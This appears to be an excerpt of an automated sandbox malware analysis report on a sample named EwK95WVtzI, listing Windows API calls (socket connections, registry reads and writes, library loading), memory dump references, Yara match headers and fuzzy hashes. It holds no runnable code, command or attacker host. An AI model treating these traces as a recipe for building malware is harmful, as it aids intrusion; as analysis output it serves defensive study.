                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 530611402-0
                                                                                                                                                                                                                                                          • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                          • Instruction ID: cbe1c51c0b1990b02a7301131653a0a27799abff3363f0aea09fbd65d82f507a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D315074A0021AEBDB10EFA8C945BFEB775BF48318F10865DE7256B2C0D3B59940CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00509144: _free.LIBCMT ref: 0050916D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005091CE
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: HeapFree.KERNEL32(00000000,00000000,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1), ref: 005073D2
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: GetLastError.KERNEL32(005062C1,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1,005062C1), ref: 005073E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005091D9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005091E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00509238
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00509243
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050924E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00509259
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 393e60a867e19aeb7879eb30fd13b120711b756b36f91979827bf2db5a404af5
                                                                                                                                                                                                                                                          • Instruction ID: 57ea17ac4a922d486cb467190973393bd0f14a1700a0f37fa15bfc819a9184d2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 393e60a867e19aeb7879eb30fd13b120711b756b36f91979827bf2db5a404af5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11FEB1A44B4AA6D630B7B0CC4EFCF7FDC7F88700F404819BA99660E7D665B5049660
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                                          • Opcode ID: 99a7cecc1353cf7027988fca55a472a6418402936d00226c0027fa3c7446cf82
                                                                                                                                                                                                                                                          • Instruction ID: 227e3510462f989f4b3caa39c09de1e5466d286f19f0b2f41d7cd8c1809abd70
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99a7cecc1353cf7027988fca55a472a6418402936d00226c0027fa3c7446cf82
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBF02D35A04602B7D631B3257C1DADF1F55BFDA761F25C514FA14B21D1FE209825A131
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00507439,00000000,00000000,00000000,00000000,?,00507636,00000006,FlsSetValue), ref: 005074C4
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00507439,00000000,00000000,00000000,00000000,?,00507636,00000006,FlsSetValue,00526FB8,FlsSetValue,00000000,00000364,?,00506AB6), ref: 005074D0
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00507439,00000000,00000000,00000000,00000000,?,00507636,00000006,FlsSetValue,00526FB8,FlsSetValue,00000000), ref: 005074DE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID: -^P
                                                                                                                                                                                                                                                          • API String ID: 3177248105-2156342671
                                                                                                                                                                                                                                                          • Opcode ID: 46d2d98bbfebbca9bcdec517eac88d0cc4d8b52b89e0aed7585985c7dba96572
                                                                                                                                                                                                                                                          • Instruction ID: 325ac3610ff8cbad7467277d05517ffcc7780b0c3672f0ffb408c8f82214c60f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46d2d98bbfebbca9bcdec517eac88d0cc4d8b52b89e0aed7585985c7dba96572
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1901AC36E1922A9BCF314F799C44D9A7F98FF5D7A1B104620F90AD7180D724E815C7E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005089A6,00000003,?,00508946,00000003,0052D508,0000000C,00508A59,00000003,00000002), ref: 005089D1
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005089E4
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,005089A6,00000003,?,00508946,00000003,0052D508,0000000C,00508A59,00000003,00000002,00000000), ref: 00508A07
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                          • Opcode ID: 9eee810f80fb8173bdf7dd3c09f2249df2c48dac00f4c6617976abfce6e825cd
                                                                                                                                                                                                                                                          • Instruction ID: dc17366115242cefdd2eb43b4467831eebdf3fb5ce4001ff14c61e613f24191d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9eee810f80fb8173bdf7dd3c09f2249df2c48dac00f4c6617976abfce6e825cd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFF03C31A4421DBBCB159FA4EC0EFEDBFA5FF08715F004265A809A62A0CF705A54DA95
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 013F92A7
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 013F92AE
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 013F92C1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                          • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                          • Opcode ID: 7a64c577da1cf1bfaaca8021b70ae192113671f5a9e88e2c432ec39c71e3c2f2
                                                                                                                                                                                                                                                          • Instruction ID: 6c1c9407d73e98c3d72f14eae4be68aa9174194fa0135d3d550046de1afe56b4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a64c577da1cf1bfaaca8021b70ae192113671f5a9e88e2c432ec39c71e3c2f2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E0E57488020CABCB10ABE4994DF8DBB7CBB0830AF506198EA01A2284D67496448B51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 013F72BD
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 013F72F9
                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 013F7329
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 013F7343
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 013F73A9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852505512-0
                                                                                                                                                                                                                                                          • Opcode ID: 6a19977db7d100ecd0610a2c38e8c1bc7eaad7ea0e86df0a6a523ed1e8613802
                                                                                                                                                                                                                                                          • Instruction ID: 93a9afea8e89402d40762606bc00d8fdfe3c01dd697a14a5da4103bb1ac861db
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a19977db7d100ecd0610a2c38e8c1bc7eaad7ea0e86df0a6a523ed1e8613802
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97415A74A00209EFEB14DF98C885BAEBBB5FF48304F14855DEA05AB281D775DA44CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,00000100,005084BC,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0050930E
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00509346
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00509397
                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 005093A9
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 005093B2
                                                                                                                                                                                                                                                            • Part of subcall function 00509273: RtlAllocateHeap.NTDLL(00000000,?,?,?,0050815B,00000220), ref: 005092A5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 313313983-0
                                                                                                                                                                                                                                                          • Opcode ID: 989404373e8997df6b45d87a5a6a470c1e89edb8d43ec550a8ee2c4c59adf3c9
                                                                                                                                                                                                                                                          • Instruction ID: 9baa25b6ed7f3d7b875667878a04edc741719800aabeb3e776d6dff677de1d5f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 989404373e8997df6b45d87a5a6a470c1e89edb8d43ec550a8ee2c4c59adf3c9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A331A972A0020AABDF248FA5DC89EEE7FA5FB44310B044A28EC04D62D5E735CD54CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 013F7429
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 013F7465
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 013F7473
                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 013F748B
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 013F7495
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3926099652-0
                                                                                                                                                                                                                                                          • Opcode ID: f4d1d6c292f0768bac5c0602ad5ff4109086e7889cf1147677b5813ba8a2daa9
                                                                                                                                                                                                                                                          • Instruction ID: ae5345be48fa156cd74c48e7ad243d2ae65194ca57bac5267fb308f95f0a15c7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4d1d6c292f0768bac5c0602ad5ff4109086e7889cf1147677b5813ba8a2daa9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D213D75A4020CABEB14DFA8D889FFE7B78BB48704F04855CFB01AA280D7B49644CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F9690
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 013F96DF
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F96E9
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F9701
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 013F9719
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                                                                                                          • Opcode ID: 0addf98c66ad645778eac7f57b8d7579fa0db2fd608a9a732b2f0694592de2cd
                                                                                                                                                                                                                                                          • Instruction ID: dd1b4693d3c10ec58714e2a02139b361c90d14bd40c4bd619db3ce428f434057
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0addf98c66ad645778eac7f57b8d7579fa0db2fd608a9a732b2f0694592de2cd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0721F87490024AEFCB14CFA8D888BAE7BB9BF44309F14854CFA15A7240D774EA58CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(005062FC,?,?,005062C1,00505E2D), ref: 00506A6D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00506AA2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00506AC9
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,005062C1,00505E2D), ref: 00506AD6
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,005062C1,00505E2D), ref: 00506ADF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                          • Opcode ID: 31a9cd1c3c892575fd1baa109851635324cdc90674b939787ae9a69e8d5945b4
                                                                                                                                                                                                                                                          • Instruction ID: bb7ced6d8485b70eea373f1767c793da8a05fbb7021324c49effa9676485e2a9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31a9cd1c3c892575fd1baa109851635324cdc90674b939787ae9a69e8d5945b4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C012B35704601BBD711B7256C4D99F1D5AFBD63647218115F915A21D1EB6088259060
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005090F3
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: HeapFree.KERNEL32(00000000,00000000,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1), ref: 005073D2
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: GetLastError.KERNEL32(005062C1,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1,005062C1), ref: 005073E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00509105
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00509117
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00509129
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050913B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: b5809501c2767c4c8755456de030952835c3e96ac9faffbc38f2610cbb3190ae
                                                                                                                                                                                                                                                          • Instruction ID: 6a54fe4c8a8259517a7262413bfe2b53c16df1e760a9674d931349b865359cba
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5809501c2767c4c8755456de030952835c3e96ac9faffbc38f2610cbb3190ae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F04F36A0C2096BC630EB54EC8AC9E7BE9BB493107544C09F808DB696DB30FC80DA70
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050C181
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: HeapFree.KERNEL32(00000000,00000000,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1), ref: 005073D2
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: GetLastError.KERNEL32(005062C1,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1,005062C1), ref: 005073E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050C193
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050C1A6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050C1B7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050C1C8
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 62a4ebbfdac9391f6012f400ad354cecf37dcf56e43cead4da9b66629c61f13c
                                                                                                                                                                                                                                                          • Instruction ID: e9dda3dac0d7d38f6cd06dceb12e0819fa67acb6b7d6dad375ce16d55e626105
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62a4ebbfdac9391f6012f400ad354cecf37dcf56e43cead4da9b66629c61f13c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EF0307C81C6259BDA61AF24BC094ED3F60B72B7283041A0AF814532B2DB70194DFBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
